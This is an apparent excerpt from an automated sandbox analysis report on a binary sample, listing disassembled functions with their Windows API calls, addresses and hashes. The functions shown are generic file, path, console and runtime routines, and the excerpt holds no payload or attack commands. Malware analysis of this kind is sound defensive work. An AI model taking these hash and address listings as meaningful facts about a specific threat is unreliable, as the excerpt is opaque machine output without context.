                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                                          • String ID:
                                                          • API String ID: 1876002356-0
                                                          • Opcode ID: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                          • Instruction ID: 16c3c4676ac924f9bbc116e317de4c153b4417dc4f771cedf4f7c3d11fae8c19
                                                          • Opcode Fuzzy Hash: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                          • Instruction Fuzzy Hash: CF31B5B5E022159BFF54CBA9A9C07BE73A4EB09315F09007ADD41E7352E739DC018BA9
                                                          Function 00450F41 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,004481E1,00000001,?,004481E1,h5@,?,00000000), ref: 00450F57
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F64
                                                          • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F8A
                                                          • SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00450FB0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FilePointer$ErrorLast
                                                          • String ID:
                                                          • API String ID: 142388799-0
                                                          • Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                          • Instruction ID: 1514e75016c253887b100742bd2e0aa0853bf3b84a7615600f3982ba0bc5b80c
                                                          • Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                          • Instruction Fuzzy Hash: B1116636805219ABDF209F51CC48A9F3F7DFB00725F004115FC20922A1D7B19A40CAA5
                                                          Function 00455DA6 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455DBC
                                                          • GetLastError.KERNEL32(?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104,00446C37), ref: 00455DC6
                                                          • __dosmaperr.LIBCMT ref: 00455DCD
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000), ref: 00455DF7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FullNamePath$ErrorLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 1391015842-0
                                                          • Opcode ID: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                          • Instruction ID: 83aad2bcbc88ad1b691cbbc28925ead7dadcf548e2ab308fdfae5f9a37bb2b5e
                                                          • Opcode Fuzzy Hash: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                          • Instruction Fuzzy Hash: 50F0A436200700AFDB205F67CC09E277BBDEF45361710842AF956C2521DB76EC14CB68
                                                          Function 00455E0C Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001), ref: 00455E22
                                                          • GetLastError.KERNEL32(?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104), ref: 00455E2C
                                                          • __dosmaperr.LIBCMT ref: 00455E33
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455E5D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FullNamePath$ErrorLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 1391015842-0
                                                          • Opcode ID: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                          • Instruction ID: 58d23dfaa7b1bff066b533c88cf6507f29fdd6be1c16f2e24496f8287ce13408
                                                          • Opcode Fuzzy Hash: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                          • Instruction Fuzzy Hash: 49F0A436200600AFDF205F72DC09E2B7BADEF44361714842AF959D2121DB75EC14CB58
                                                          Function 0045BD08 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000), ref: 0045BD1F
                                                          • GetLastError.KERNEL32(?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?,?,00450492,00443CFB), ref: 0045BD2B
                                                            • Part of subcall function 0045BD7C: CloseHandle.KERNEL32(FFFFFFFE,0045BD3B,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?), ref: 0045BD8C
                                                          • ___initconout.LIBCMT ref: 0045BD3B
                                                            • Part of subcall function 0045BD5D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0045BCF9,00459F57,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD70
                                                          • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                          • Instruction ID: a34e4e029ef2e4d5dd3ba3bcd054cc3c3a598788143b8b19420d5231d0b345e8
                                                          • Opcode Fuzzy Hash: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                          • Instruction Fuzzy Hash: 0CF0F836140119BBCF221F959C08ADA3F3AEF493A1F044021FE09D5171D7B28864ABD9
                                                          Function 0045962F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 004598A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ___except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3493665558-3733052814
                                                          • Opcode ID: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                          • Instruction ID: 4df6c2a030d07bf616ce91cf83237d0554f1a363a859cf179326f8a266afaebb
                                                          • Opcode Fuzzy Hash: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                          • Instruction Fuzzy Hash: 0E31C4B6400219EBCF269F51CC4096A7B65FF0A716B18419FFC5449323C73ACC66DB8A